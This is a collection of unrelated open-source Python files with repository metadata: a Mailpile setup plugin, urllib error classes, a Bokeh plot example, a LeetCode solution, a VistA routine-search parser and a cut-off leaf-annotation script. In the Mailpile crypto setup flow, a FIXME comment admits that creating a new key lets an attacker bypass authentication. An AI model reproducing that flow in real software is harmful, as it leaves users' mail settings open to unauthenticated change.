self.testing = None
return method(*args, **kwargs)
def _testing_data(self, method, tdata, *args, **kwargs):
result = self._testing_yes(method, *args, **kwargs) or []
return (result
if (self.testing is None) else
(self.testing and tdata or []))
def setup_command(self, session):
raise Exception('FIXME')
class SetupGetEmailSettings(TestableWebbable):
"""Guess server details for an e-mail address"""
SYNOPSIS = (None, 'setup/email_servers', 'setup/email_servers', None)
HTTP_CALLABLE = ('GET', )
HTTP_QUERY_VARS = dict_merge(TestableWebbable.HTTP_QUERY_VARS, {
'email': 'E-mail address'
})
TEST_DATA = {
'imap_host': 'imap.wigglebonk.com',
'imap_port': 993,
'imap_tls': True,
'pop3_host': 'pop3.wigglebonk.com',
'pop3_port': 110,
'pop3_tls': False,
'smtp_host': 'smtp.wigglebonk.com',
'smtp_port': 465,
'smtp_tls': False
}
def _get_domain_settings(self, domain):
raise Exception('FIXME')
def setup_command(self, session):
results = {}
        for email in list(self.args) + self.data.get('email', []):
settings = self._testing_data(self._get_domain_settings,
self.TEST_DATA, email)
if settings:
results[email] = settings
        if results:
            return self._success(_('Found settings for %d addresses')
                                 % len(results), results)
        else:
            return self._error(_('No settings found'))
class SetupWelcome(TestableWebbable):
SYNOPSIS = (None, None, 'setup/welcome', None)
HTTP_CALLABLE = ('GET', 'POST')
HTTP_POST_VARS = dict_merge(TestableWebbable.HTTP_POST_VARS, {
'language': 'Language selection'
})
def bg_setup_stage_1(self):
        # Wait a bit, so the user has something to look at before we
# block the web server and do real work.
time.sleep(2)
        # Initial configuration of the app goes here...
if not self.session.config.tags:
with BLOCK_HTTPD_LOCK, Idle_HTTPD(allowed=0):
self.basic_app_config(self.session)
# Next, if we have any secret GPG keys, extract all the e-mail
# addresses and create a profile for each one.
with BLOCK_HTTPD_LOCK, Idle_HTTPD(allowed=0):
SetupProfiles(self.session).auto_create_profiles()
def setup_command(self, session):
config = session.config
if self.data.get('_method') == 'POST' or self._testing():
language = self.data.get('language', [''])[0]
if language:
try:
i18n = lambda: ActivateTranslation(session, config,
language)
if not self._testing_yes(i18n):
raise ValueError('Failed to configure i18n')
config.prefs.language = language
if not self._testing():
self._background_save(config=True)
except ValueError:
return self._error(_('Invalid language: %s') % language)
config.slow_worker.add_unique_task(
session, 'Setup, Stage 1', lambda: self.bg_setup_stage_1())
results = {
'languages': ListTranslations(config),
'language': config.prefs.language
}
return self._success(_('Welcome to Mailpile!'), results)
class SetupCrypto(TestableWebbable):
SYNOPSIS = (None, None, 'setup/crypto', None)
HTTP_CALLABLE = ('GET', 'POST')
HTTP_POST_VARS = dict_merge(TestableWebbable.HTTP_POST_VARS, {
'choose_key': 'Select an existing key to use',
'passphrase': 'Specify a passphrase',
'passphrase_confirm': 'Confirm the passphrase',
'index_encrypted': 'y/n: index encrypted mail?',
        # 'obfuscate_index': 'y/n: obfuscate keywords?',  # Omitted due to DANGER
'encrypt_mail': 'y/n: encrypt locally stored mail?',
'encrypt_index': 'y/n: encrypt search index?',
'encrypt_vcards': 'y/n: encrypt vcards?',
'encrypt_events': 'y/n: encrypt event log?',
'encrypt_misc': 'y/n: encrypt plugin and misc data?'
})
TEST_DATA = {}
def list_secret_keys(self):
today = date.today().strftime("%Y-%m-%d")
keylist = {}
for key, details in self._gnupg().list_secret_keys().iteritems():
# Ignore revoked keys
if ("revocation-date" in details and
details["revocation-date"] <= today):
# FIXME: Does this check expiry as well?
continue
# Ignore keys that cannot both encrypt and sign
caps = details["capabilities_map"]
if not caps["encrypt"] or not caps["sign"]:
continue
keylist[key] = details
return keylist
def gpg_key_ready(self, gpg_keygen):
if not gpg_keygen.failed:
self.session.config.prefs.gpg_recipient = gpg_keygen.generated_key
self.make_master_key()
self._background_save(config=True)
self.save_profiles_to_key()
def save_profiles_to_key(self, key_id=None, add_all=False, now=False,
profiles=None):
if key_id is None:
if (Setup.KEY_CREATING_THREAD and
not Setup.KEY_CREATING_THREAD.failed):
key_id = Setup.KEY_CREATING_THREAD.generated_key
add_all = True
if not add_all:
self.session.ui.warning('FIXME: Not updating GPG key!')
return
if key_id is not None:
uids = []
data = ListProfiles(self.session).run().result
for profile in data['profiles']:
uids.append({
'name': profile["fn"],
'email': profile["email"][0]["email"],
'comment': profile.get('note', '')
})
if not uids:
return
editor = GnuPGKeyEditor(key_id, set_uids=uids,
sps=self.session.config.gnupg_passphrase,
deletes=max(10, 2*len(uids)))
def start_editor(*unused_args):
with Setup.KEY_WORKER_LOCK:
Setup.KEY_EDITING_THREAD = editor
editor.start()
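        # If key generation or an earlier key edit is still in flight, chain
        # this editor onto that thread's completion callback; otherwise (or
        # when `now` is set) start it straight away.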
with Setup.KEY_WORKER_LOCK:
if now:
start_editor()
elif Setup.KEY_EDITING_THREAD is not None:
Setup.KEY_EDITING_THREAD.on_complete('edit keys',
start_editor)
elif Setup.KEY_CREATING_THREAD is not None:
Setup.KEY_CREATING_THREAD.on_complete('edit keys',
start_editor)
else:
start_editor()
def setup_command(self, session):
changed = authed = False
results = {
'secret_keys': self.list_secret_keys(),
}
error_info = None
if self.data.get('_method') == 'POST' or self._testing():
# 1st, are we choosing or creating a new key?
choose_key = self.data.get('choose_key', [''])[0]
if choose_key and not error_info:
if (choose_key not in results['secret_keys'] and
choose_key != '!CREATE'):
error_info = (_('Invalid key'), {
'invalid_key': True,
'chosen_key': choose_key
})
# 2nd, check authentication...
#
# FIXME: Creating a new key will allow a malicious actor to
# bypass authentication and change settings.
#
try:
passphrase = self.data.get('passphrase', [''])[0]
passphrase2 = self.data.get('passphrase_confirm', [''])[0]
chosen_key = ((not error_info) and choose_key
) or session.config.prefs.gpg_recipient
if not error_info:
assert(passphrase == passphrase2)
if chosen_key == '!CREATE':
assert(passphrase != '')
sps = SecurePassphraseStorage(passphrase)
elif chosen_key:
sps = mailpile.auth.VerifyAndStorePassphrase(
session.config,
passphrase=passphrase,
key=chosen_key)
else:
sps = mailpile.auth.VerifyAndStorePassphrase(
session.config, passphrase=passphrase)
if not chosen_key:
choose_key = '!CREATE'
results['updated_passphrase'] = True
session.config.gnupg_passphrase.data = sps.data
mailpile.auth.SetLoggedIn(self)
except AssertionError:
error_info = (_('Invalid passphrase'), {
'invalid_passphrase': True,
'chosen_key': session.config.prefs.gpg_recipient
})
            # 3rd, if necessary, create the master key and/or GPG key
with BLOCK_HTTPD_LOCK, Idle_HTTPD():
if choose_key and not error_info:
session.config.prefs.gpg_recipient = choose_key
# FIXME: This should probably only happen if the GPG
# key was successfully created.
self.make_master_key()
changed = True
with Setup.KEY_WORKER_LOCK:
if ((not error_info) and
(session.config.prefs.gpg_recipient
== '!CREATE') and
(Setup.KEY_CREATING_THREAD is None or
Setup.KEY_CREATING_THREAD.failed)):
gk = GnuPGKeyGenerator(
sps=session.config.gnupg_passphrase,
on_complete=('notify',
lambda: self.gpg_key_ready(gk)))
Setup.KEY_CREATING_THREAD = gk
Setup.KEY_CREATING_THREAD.start()
# Finally we update misc. settings
for key in self.HTTP_POST_VARS.keys():
# FIXME: This should probably only happen if the GPG
# key was successfully created.
# Continue iff all is well...
if error_info:
break
if key in (['choose_key', 'passphrase', 'passphrase_confirm'] +
TestableWebbable.HTTP_POST_VARS.keys()):
continue
try:
val = self.data.get(key, [''])[0]
if val:
session.config.prefs[key] = self.TRUTHY[val.lower()]
changed = True
except (ValueError, KeyError):
error_info = (_('Invalid preference'), {
'invalid_setting': True,
'variable': key
})
results.update({
'creating_key': (Setup.KEY_CREATING_THREAD is not None and
Setup.KEY_CREATING_THREAD.running),
'creating_failed': (Setup.KEY_CREATING_THREAD is not None and
Setup.KEY_CREATING_THREAD.failed),
'chosen_key': session.config.prefs.gpg_recipient,
'prefs': {
'index_encrypted': session.config.prefs.index_encrypted,
'obfuscate_index': session.config.prefs.obfuscate_index,
'encrypt_mail': session.config.prefs.encrypt_mail,
'encrypt_index': session.config.prefs.encrypt_index,
'encrypt_vcards': session.config.prefs.encrypt_vcards,
'encrypt_events': session.config.prefs.encrypt_events,
'encrypt_misc': session.config.prefs.encrypt_misc
}
})
if changed:
self._background_save(config=True)
if error_info:
return self._error(error_info[0],
info=error_info[1], result=results)
elif changed:
return self._success(_('Updated crypto preferences'), results)
else:
return self._success(_('Configure crypto preferences'), results)
class SetupProfiles(SetupCrypto):
SYNOPSIS = (None, None, 'setup/profiles', None)
HTTP_AUTH_REQUIRED = True
HTTP_CALLABLE = ('GET', 'POST')
HTTP_QUERY_VARS = dict_merge(TestableWebbable.HTTP_QUERY_VARS, {
})
HTTP_POST_VARS = dict_merge(TestableWebbable.HTTP_POST_VARS, {
'email': 'Create a profile for this e-mail address',
'name': 'Name associated with this e-mail',
'note': 'Profile note',
'pass': 'Password for remote accounts',
'route_id': 'Route ID for sending mail',
})
TEST_DATA = {}
# This is where we cache the passwords we are given, for use later.
# This is deliberately made a singleton on the class.
PASSWORD_CACHE = {}
def _auto_configurable(self, email):
# FIXME: Actually look things up, this is super lame
return email.endswith('@gmail.com')
def get_profiles(self, secret_keys=None):
data = ListProfiles(self.session).run().result
profiles = {}
for rid, ofs in data["rids"].iteritems():
profile = data["profiles"][ofs]
email = profile["email"][0]["email"]
name = profile["fn"]
note = profile.get('note', '')
profiles[rid] = {
"name": name,
"note": note,
"pgp_keys": [], # FIXME
"email": email,
"route_id": profile.get('x-mailpile-profile-route', ''),
"photo": profile.get('photo', [{}])[0].get('photo', ''),
"auto_configurable": self._auto_configurable(email)
}
for key, info in (secret_keys or {}).iteritems():
for uid in info['uids']:
email = uid.get('email')
if email in profiles:
profiles[email]["pgp_keys"].append(key)
return profiles
def discover_new_email_addresses(self, profiles):
addresses = {}
existing = set([p['email'] for p in profiles.values()])
for key, info in self._gnupg().list_secret_keys().iteritems():
for uid in info['uids']:
email = uid.get('email')
note = uid.get('comment')
if email:
if email in existing:
continue
if email not in addresses:
addresses[email] = {'pgp_keys': [],
'name': '', 'note': ''}
ai = addresses[email]
name = uid.get('name')
ai['name'] = name if name else ai['name']
ai['note'] = note if note else ai['note']
ai['pgp_keys'].append(key)
# FIXME: Scan Thunderbird and MacMail for e-mails, other apps...
return addresses
def auto_create_profiles(self):
new_emails = self.discover_new_email_addresses(self.get_profiles())
for email, info in new_emails.iteritems():
AddProfile(self.session, data={
'_method': 'POST',
'email': [email],
'note': [info["note"]],
'name': [info['name']]
}).run()
def _result(self):
profiles = self.get_profiles()
return {
'new_emails': self.discover_new_email_addresses(profiles),
'profiles': profiles,
'routes': self.session.config.routes,
'default_email': self.session.config.prefs.default_email
}
def setup_command(self, session):
changed = False
if self.data.get('_method') == 'POST' or self._testing():
name, email, note, pwd = (self.data.get(k, [None])[0] for k in
('name', 'email', 'note', 'pass'))
if email:
rv = AddProfile(session, data=self.data).run()
if rv.status == 'success':
#
# FIXME: We need to fire off a background process to
# try and auto-discover routes and sources.
#
if not session.config.prefs.default_email:
session.config.prefs.default_email = email
changed = True
self.save_profiles_to_key()
else:
return self._error(_('Failed to add profile'),
info=rv.error_info,
result=self._result())
if email and pwd:
sps = SecurePassphraseStorage(pwd)
SetupProfiles.PASSWORD_CACHE[email] = sps
result = self._result()
if not result['default_email']:
profiles = result['profiles'].values()
profiles.sort(key=lambda p: (len(p['pgp_keys']),
len(p['name'])))
e = result['default_email'] = profiles[-1]['email']
session.config.prefs.default_email = e
changed = True
else:
result = self._result()
if changed:
self._background_save(config=True)
return self._success(_('Your profiles'), result)
class SetupConfigureKey(SetupProfiles):
SYNOPSIS = (None, None, 'setup/configure_key', None)
HTTP_AUTH_REQUIRED = True
HTTP_CALLABLE = ('GET', 'POST')
HTTP_QUERY_VARS = dict_merge(TestableWebbable.HTTP_QUERY_VARS, {
})
HTTP_POST_VARS = dict_merge(TestableWebbable.HTTP_POST_VARS, {
})
TEST_DATA = {}
def _result(self):
keylist = self.list_secret_keys()
profiles = self.get_profiles(secret_keys=keylist)
return {
'secret_keys': keylist,
'profiles': profiles,
}
def setup_command(self, session):
# FIXME!
return self._success(_('Configuring a key'), self._result())
class SetupTestRoute(SetupProfiles):
SYNOPSIS = (None, None, 'setup/test_route', None)
HTTP_AUTH_REQUIRED = True
HTTP_CALLABLE = ('POST', )
HTTP_POST_VARS = dict_merge(TestableWebbable.HTTP_POST_VARS,
dict((k, v[0]) for k, v in
CONFIG_RULES['routes'][1].iteritems()),
{'route_id': 'ID of existing route'})
TEST_DATA = {}
def setup_command(self, session):
if self.args:
route_id = self.args[0]
elif 'route_id' in self.data:
route_id = self.data['route_id'][0]
else:
route_id = None
if route_id:
route = self.session.config.routes[route_id]
assert(route)
else:
route = {}
for k in CONFIG_RULES['routes'][1]:
if k not in self.data:
pass
elif CONFIG_RULES['routes'][1][k][1] in (int, 'int'):
route[k] = int(self.data[k][0])
else:
route[k] = self.data[k][0]
fromaddr = route.get('username', '')
if '@' not in fromaddr:
fromaddr = self.session.config.get_profile()['email']
assert(fromaddr)
error_info = {'error': _('Unknown error')}
try:
assert(SendMail(self.session, None,
[(fromaddr,
[fromaddr, 'test@mailpile.is'],
None,
[self.event])],
test_only=True, test_route=route))
return self._success(_('Route is working'),
result=route)
except OSError:
error_info = {'error': _('Invalid command'),
'invalid_command': True}
except SendMailError, e:
error_info = {'error': e.message,
'sendmail_error': True}
error_info.update(e.error_info)
except:
import traceback
traceback.print_exc()
return self._error(_('Route is not working'),
result=route, info=error_info)
class Setup(TestableWebbable):
"""Enter setup flow"""
SYNOPSIS = (None, 'setup', 'setup', '[do_gpg_stuff]')
ORDER = ('Internals', 0)
LOG_PROGRESS = True
HTTP_CALLABLE = ('GET',)
HTTP_AUTH_REQUIRED = True
# These are a global, may be modified...
KEY_WORKER_LOCK = CryptoRLock()
KEY_CREATING_THREAD = None
KEY_EDITING_THREAD = None
@classmethod
def _check_profiles(self, config):
data = ListProfiles(Session(config)).run().result
okay = routes = bad = 0
for rid, ofs in data["rids"].iteritems():
profile = data["profiles"][ofs]
if profile.get('email', None):
okay += 1
route_id = profile.get('x-mailpile-profile-route', '')
if route_id:
if route_id in config.routes:
routes += 1
else:
bad += 1
else:
bad += 1
return (routes > 0) and (okay > 0) and (bad == 0)
@classmethod
def _CHECKPOINTS(self, config):
return [
# Stage 0: Welcome: Choose app language
('language', lambda: config.prefs.language, SetupWelcome),
# Stage 1: Crypto: Configure our master key stuff
('crypto', lambda: config.prefs.gpg_recipient, SetupCrypto),
            # Stage 2: Identity (via single-page install flow)
            ('profiles', lambda: self._check_profiles(config), Setup),
            # Stage 3: Routes (via single-page install flow)
            ('routes', lambda: config.routes, Setup),
            # Stage 4: Sources (via single-page install flow)
('sources', lambda: config.sources, Setup),
# Stage 5: Is All Complete
('complete', lambda: config.web.setup_complete, Setup),
# FIXME: Check for this too?
#(lambda: config.prefs.crypto_policy != 'none', SetupConfigureKey),
]
@classmethod
def Next(cls, config, default, needed_auth=True):
if not config.loaded_config:
return default
for name, guard, step in cls._CHECKPOINTS(config):
auth_required = (step.HTTP_AUTH_REQUIRED is True
or (config.prefs.gpg_recipient and
step.HTTP_AUTH_REQUIRED == 'Maybe'))
if not guard():
if (not needed_auth) or (not auth_required):
return step
return default
def setup_command(self, session):
if '_method' in self.data:
return self._success(_('Entering setup flow'), result=dict(
((c[0], c[1]() and True or False)
for c in self._CHECKPOINTS(session.config)
)))
else:
return SetupMagic.setup_command(self, session)
_ = gettext
_plugins.register_commands(SetupMagic,
SetupGetEmailSettings,
SetupWelcome,
SetupCrypto,
SetupProfiles,
SetupConfigureKey,
SetupTestRoute,
Setup)
|
laborautonomo/Mailpile
|
mailpile/plugins/setup_magic.py
|
Python
|
apache-2.0
| 40,094
|
"""Exception classes raised by urllib.
The base exception class is URLError, which inherits from IOError. It
doesn't define any behavior of its own, but is the base class for all
exceptions defined in this package.
HTTPError is an exception class that is also a valid HTTP response
instance. It behaves this way because HTTP protocol errors are valid
responses, with a status code, headers, and a body. In some contexts,
an application may want to handle an exception like a regular
response.
"""
import urllib.response
# do these error classes make sense?
# make sure all of the IOError stuff is overridden. we just want to be
# subtypes.
class URLError(IOError):
# URLError is a sub-type of IOError, but it doesn't share any of
# the implementation. need to override __init__ and __str__.
# It sets self.args for compatibility with other EnvironmentError
# subclasses, but args doesn't have the typical format with errno in
# slot 0 and strerror in slot 1. This may be better than nothing.
def __init__(self, reason, filename=None):
self.args = reason,
self.reason = reason
if filename is not None:
self.filename = filename
def __str__(self):
return '<urlopen error %s>' % self.reason
class HTTPError(URLError, urllib.response.addinfourl):
"""Raised when HTTP error occurs, but also acts like non-error return"""
__super_init = urllib.response.addinfourl.__init__
def __init__(self, url, code, msg, hdrs, fp):
self.code = code
self.msg = msg
self.hdrs = hdrs
self.fp = fp
self.filename = url
# The addinfourl classes depend on fp being a valid file
# object. In some cases, the HTTPError may not have a valid
# file object. If this happens, the simplest workaround is to
# not initialize the base classes.
if fp is not None:
self.__super_init(fp, hdrs, url, code)
def __str__(self):
return 'HTTP Error %s: %s' % (self.code, self.msg)
# since URLError specifies a .reason attribute, HTTPError should also
# provide this attribute. See issue13211 for discussion.
@property
def reason(self):
return self.msg
# exception raised when downloaded size does not match content-length
class ContentTooShortError(URLError):
def __init__(self, message, content):
URLError.__init__(self, message)
self.content = content
|
wdv4758h/ZipPy
|
lib-python/3/urllib/error.py
|
Python
|
bsd-3-clause
| 2,461
|
# -*- coding: utf-8 -*-
# Etalage-Passim -- Customization of Etalage for Passim
# By: Emmanuel Raviart <eraviart@easter-eggs.com>
#
# Copyright (C) 2011, 2012, 2013 Easter-eggs
# http://gitorious.org/passim/etalage-passim
#
# This file is part of Etalage-Passim.
#
# Etalage-Passim is free software; you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# Etalage-Passim is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""Objects for subscribers, subscriptions, sites and users"""
from suq import monpyjama, representations
from . import conv
class Site(representations.UserRepresentable):
domain_name = None
from_bson = staticmethod(conv.check(conv.bson_to_site))
subscriptions = None
to_bson = conv.check(conv.site_to_bson)
url = None
class Subscriber(representations.UserRepresentable, monpyjama.Wrapper):
collection_name = 'subscribers'
emegalis = False
from_bson = staticmethod(conv.check(conv.bson_to_subscriber))
id = None
organization = None # Organism name
sites = None
territory_kind_code = None
to_bson = conv.check(conv.subscriber_to_bson)
users = None
@property
def territory(self):
from . import ramdb
if self.territory_kind_code is None:
return None
territory_id = ramdb.territory_id_by_kind_code.get((self.territory_kind_code['kind'],
self.territory_kind_code['code']))
if territory_id is None:
return None
return ramdb.territory_by_id.get(territory_id)
class Subscription(representations.UserRepresentable):
from_bson = staticmethod(conv.check(conv.bson_to_subscription))
id = None
options = None
territory_kind_code = None
to_bson = conv.check(conv.subscription_to_bson)
type = None
url = None
@property
def territory(self):
from . import ramdb
if self.territory_kind_code is None:
return None
territory_id = ramdb.territory_id_by_kind_code.get((self.territory_kind_code['kind'],
self.territory_kind_code['code']))
if territory_id is None:
return None
return ramdb.territory_by_id.get(territory_id)
class User(representations.UserRepresentable):
from_bson = staticmethod(conv.check(conv.bson_to_user))
to_bson = conv.check(conv.user_to_bson)
|
Gentux/etalage-passim
|
etalagepassim/subscribers.py
|
Python
|
agpl-3.0
| 2,843
|
"""
Given a string s, find the longest palindromic subsequence's length in s. You may assume that the maximum length of s is 1000.
Example 1:
Input:
"bbbab"
Output:
4
One possible longest palindromic subsequence is "bbbb".
Example 2:
Input:
"cbbd"
Output:
2
One possible longest palindromic subsequence is "bb".
Constraints:
1 <= s.length <= 1000
s consists only of lowercase English letters.
"""
class Solution:
def longestPalindromeSubseq(self, s: str) -> int:
n = len(s)
dp = [[1] * n for _ in range(n)]
for j in range(1, len(s)):
for i in reversed(range(0, j)):
if s[i] == s[j]:
dp[i][j] = 2 + dp[i + 1][(j - 1)] if i + 1 <= j - 1 else 2
else:
dp[i][j] = max(dp[i + 1][j], dp[i][(j - 1)])
return dp[0][(n-1)]
|
franklingu/leetcode-solutions
|
questions/longest-palindromic-subsequence/Solution.py
|
Python
|
mit
| 855
|
from __future__ import print_function
from bokeh.util.browser import view
from bokeh.document import Document
from bokeh.embed import file_html
from bokeh.models.glyphs import Circle
from bokeh.models import Plot, LinearAxis, Grid, ColumnDataSource, PanTool, WheelZoomTool, Title
from bokeh.resources import INLINE
from bokeh.sampledata.iris import flowers
colormap = {'setosa': 'red', 'versicolor': 'green', 'virginica': 'blue'}
flowers['color'] = flowers['species'].map(lambda x: colormap[x])
source = ColumnDataSource(
data=dict(
petal_length=flowers['petal_length'],
petal_width=flowers['petal_width'],
sepal_length=flowers['sepal_length'],
sepal_width=flowers['sepal_width'],
color=flowers['color']
)
)
plot = Plot(plot_width=800, plot_height=400)
plot.title.text = "Iris Data"
circle = Circle(
x="petal_length", y="petal_width", size=10,
fill_color="color", fill_alpha=0.2, line_color="color"
)
plot.add_glyph(source, circle)
xaxis = LinearAxis(axis_label="petal length", major_tick_in=0)
plot.add_layout(xaxis, 'below')
yaxis = LinearAxis(axis_label="petal width", major_tick_in=0)
plot.add_layout(yaxis, 'left')
plot.add_layout(Grid(dimension=0, ticker=xaxis.ticker))
plot.add_layout(Grid(dimension=1, ticker=yaxis.ticker))
plot.add_tools(PanTool(), WheelZoomTool())
# Add a caption as a title placed in "below" layout panel.
msg = """The Iris flower data set, or Fisher's Iris data set, is a multivariate data set introduced by Ronald Fisher in his 1936 paper."""
caption = Title(text=msg, align='left', text_font_size='10pt')
plot.add_layout(caption, 'below')
doc = Document()
doc.add_root(plot)
if __name__ == "__main__":
doc.validate()
filename = "iris.html"
with open(filename, "w") as f:
f.write(file_html(doc, INLINE, "Iris Data Scatter Example"))
print("Wrote %s" % filename)
view(filename)
|
mindriot101/bokeh
|
examples/models/file/iris.py
|
Python
|
bsd-3-clause
| 1,904
|
#---------------------------------------------------------------------------
# Copyright 2013 The Open Source Electronic Health Record Alliance
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#---------------------------------------------------------------------------
from __future__ import print_function
from builtins import range
import os,sys,argparse,re,fnmatch
from PatchInfoParser import installNameToDirName
from VistATestClient import VistATestClientFactory, createTestClientArgParser
routinefound = re.compile('^[A-Z0-9]+\.[A-Za-z]')
searchers=[]
# Search array is the properly escaped search strings from the Final Review
searcharray=['////','DIC\(0\)','\^UTILITY','\^TMP','\^XTMP','\%','\$I','U\=','K \^','\^\(','IO']
regexsearcharray=['////','DIC\(0\)','\^UTILITY','\^TMP','\^XTMP','\%','\$I','U\=','K \^','\^\(','S[:0-9A-Z=]* IO\=','K[:A-Z0-9=]* IO']
def findGTMRoutinesDir():
return os.getenv("gtmroutines").split(')')[0].split("(")[1]
def GTMRFind(outputDir,outputfilename,routineset):
outputfilepath = os.path.join(outputDir,outputfilename)
outputfile = open(outputfilepath,"w")
for searchstring in regexsearcharray:
searchers.append( re.compile(searchstring))
routinedir = findGTMRoutinesDir()
for root,dirnames,filenames in os.walk(routinedir):
for filename in fnmatch.filter(filenames,'*.m'):
routinename = filename.replace(".m","")
if routinename in routineset:
outputfile.write(filename+ "\n")
routine = open(routinedir+"/"+filename,'r')
for line in routine:
for index in range(0,len(regexsearcharray)):
if searchers[index].search(line):
outputfile.write(line)
def WriteRCheck(testClient,outputDir,filename,routinelist=['*']):
logpath = os.path.join(outputDir,"RCHECK.log")
testClient.setLogFile(logpath)
connection = testClient.getConnection()
testClient.waitForPrompt()
connection.send("DO ^%RCHECK\r")
for routine in routinelist:
connection.expect("Routine")
connection.send(routine+"\r")
connection.expect("Routine")
connection.send("\r")
index = connection.expect(["Device",testClient.getPrompt()])
if index == 0:
outputfile = os.path.join(outputDir,filename)
connection.send(outputfile + "\r")
connection.expect("Parameters")
connection.send("\r")
connection.expect([testClient.getPrompt(),"overwrite it"],600)
connection.send('\r')
testClient.waitForPrompt()
else:
print("No routines found for %RCheck")
connection.send("\r")
def WriteRFind(testClient,outputDir,filename,routinelist=['*']):
connection = testClient.getConnection()
testClient.waitForPrompt()
logpath = os.path.join(outputDir,"RFind.log")
testClient.setLogFile(logpath)
command = 'D ^%RFIND\r'
connection.send(command.replace('\\',''))
for searchstring in searcharray:
connection.expect("Search For")
connection.send(searchstring.replace('\\','')+"\r")
connection.expect("Search For")
connection.send("\r")
connection.expect("Exact Upper/Lowercase Match")
connection.send("\r")
connection.expect("Show all searched routines")
connection.send("\r")
for routine in routinelist:
connection.expect("Routine")
connection.send(routine+"\r")
connection.expect("Routine")
connection.send("\r")
index = connection.expect(["Device",testClient.getPrompt()])
if index ==0 :
outputfile = os.path.join(outputDir,filename)
connection.send(outputfile + "\r")
connection.expect("Parameters")
connection.send("\r")
connection.expect([testClient.getPrompt(),"overwrite it"],600)
connection.send("\r")
testClient.waitForPrompt()
else:
print("No Routines found for %RFIND")
connection.send("\r")
def XINDEXParser(outputDir,installname):
NEKsearchstring = "^>>"
Routinenamestring= "INDEX OF [A-Z0-9]"
sourcefile= os.path.join(outputDir,installNameToDirName(installname))
try:
NEKoutputDir= os.path.join(outputDir,"NotExplicitlyKilled")
os.mkdir(NEKoutputDir)
except:
pass
outputfile= os.path.join(NEKoutputDir,installNameToDirName(installname))
xindexoutput = open(sourcefile + ".log",'r')
notexplicitlykilled = open(outputfile + "NEK.log",'w')
for line in xindexoutput:
if re.search(Routinenamestring,line) or re.search(NEKsearchstring,line):
notexplicitlykilled.write(line + "\r")
elif re.search("CROSS-REFERENCING ALL ROUTINES",line):
break
def RFindParser(rfindinput,searchers,filearray,routineset=False):
routine=''
# Open the RFind output file and read each line
rfindfile=open(rfindinput,'r')
for line in rfindfile:
# If finding a line with a routine name, write out the status
if routinefound.search(line):
routine,ext = line.split('.')
# check to see if a routine set is given, and if the routine is in the set
if routine in routineset:
print("Writing findings for "+ routine)
else:
# Once a routine is found, check the next lines for the strings in the searcharray
for index in range(0,len(regexsearcharray)):
if searchers[index].search(line):
# If it matches and routine is in routine set, write to the correct file.
if routine in routineset:
filearray[index].write(routine+': '+line)
def RCheckParser(rcheckinput,outputDir,routineset):
rcheckfile=open(rcheckinput,'r')
rcheckresults = open(os.path.join(outputDir,"RCheckParsedresults.txt"),'w')
# Open the RCheck output file and read each line
for line in rcheckfile:
if routinefound.search(line):
# When a routinename is found, split over the extension to separate the
# routine name from the potential error
routine,errorline = line.split('.INT')
# Check for the routineset being passed and if the routine is in it.
if routine in routineset:
if re.search('Error [0-9]+',line):
rcheckresults.write(line)
print("An error has been found in " + routine)
def ParseOutput(outputDir,FindFile,CheckFile,RoutineSet):
filearray = [open(outputDir+'fourslash.txt','w'),open(outputDir+'dic0.txt','w'),open(outputDir+'utility.txt','w'),open(outputDir+'tmp.txt','w'),
open(outputDir+'xtmp.txt','w'),open(outputDir+'percent.txt','w'),open(outputDir+'dollari.txt','w'),open(outputDir+'uequals.txt','w'),
open(outputDir+'Kcarat.txt','w'),open(outputDir+'nakedreference.txt','w'),open(outputDir+'IOSet.txt','w'),open(outputDir+'IOKill.txt','w'),]
# Compile the regular expressions in the searcharray
for searchstring in regexsearcharray:
searchers.append( re.compile(searchstring))
#Parse only the files that are given in the command.
if FindFile:
RFindParser(FindFile,searchers,filearray,RoutineSet)
if CheckFile:
RCheckParser(CheckFile,outputDir,RoutineSet)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='RFind output parser for OTJ Final Review')
parser.add_argument('-rs', required=False, dest='routineset',
help='Directory which holds files of routines to limit search.')
parser.add_argument('-find', required=False, dest='Ffile',
help='Filepath to the Output file of the RFind function.')
parser.add_argument('-check', required=False, dest='Cfile',
help='Filepath to the Output file of the RCheck function.')
parser.add_argument('-o', required=False, dest='outputDir', default='',
help='Directory to store the output text files .')
result = vars(parser.parse_args())
ParseOutput(result['outputDir'],result['Ffile'],result['Cfile'],result['routineset'])
|
josephsnyder/VistA
|
Scripts/OTJParseEvidenceOutput.py
|
Python
|
apache-2.0
| 8,153
|
"""Script for generating annotated leaf."""
import argparse
import os
import logging
import json
from jicbioimage.core.io import AutoWrite
from jicbioimage.illustrate import AnnotatedImage
from utils import get_microscopy_collection
from parameters import Parameters
from surface import surface_from_stack
from projection import (
project_wall,
project_marker,
)
from geometry_mapper import original_image_point
__version__ = "0.1.0"
def save_annotated_leaf(input_dir, input_image, output_file, random, **kwargs):
"""Write out annotated leaf image."""
microscopy_collection = get_microscopy_collection(input_image)
wall_stack = microscopy_collection.zstack(c=kwargs["wall_channel"])
surface = surface_from_stack(wall_stack, **kwargs)
wall_projection = project_wall(wall_stack, surface, **kwargs)
marker_stack = microscopy_collection.zstack(c=kwargs["marker_channel"])
# Refactor with analysis script to ensure always in sync.
marker_projection = project_marker(marker_stack, surface, **kwargs)
wall_ann = AnnotatedImage.from_grayscale(wall_projection, (1, 0, 0))
marker_ann = AnnotatedImage.from_grayscale(marker_projection, (0, 1, 0))
ann = wall_ann + marker_ann
json_fpaths = [os.path.join(input_dir, f)
for f in os.listdir(input_dir)
if f.endswith(".json")]
y_key = "normalised_marker_y_coord"
x_key = "normalised_marker_x_coord"
for fpath in json_fpaths:
with open(fpath) as fh:
celldata = json.load(fh)
if y_key not in celldata:
continue
if x_key not in celldata:
continue
print(fpath)
frac_pt = celldata[y_key], celldata[x_key]
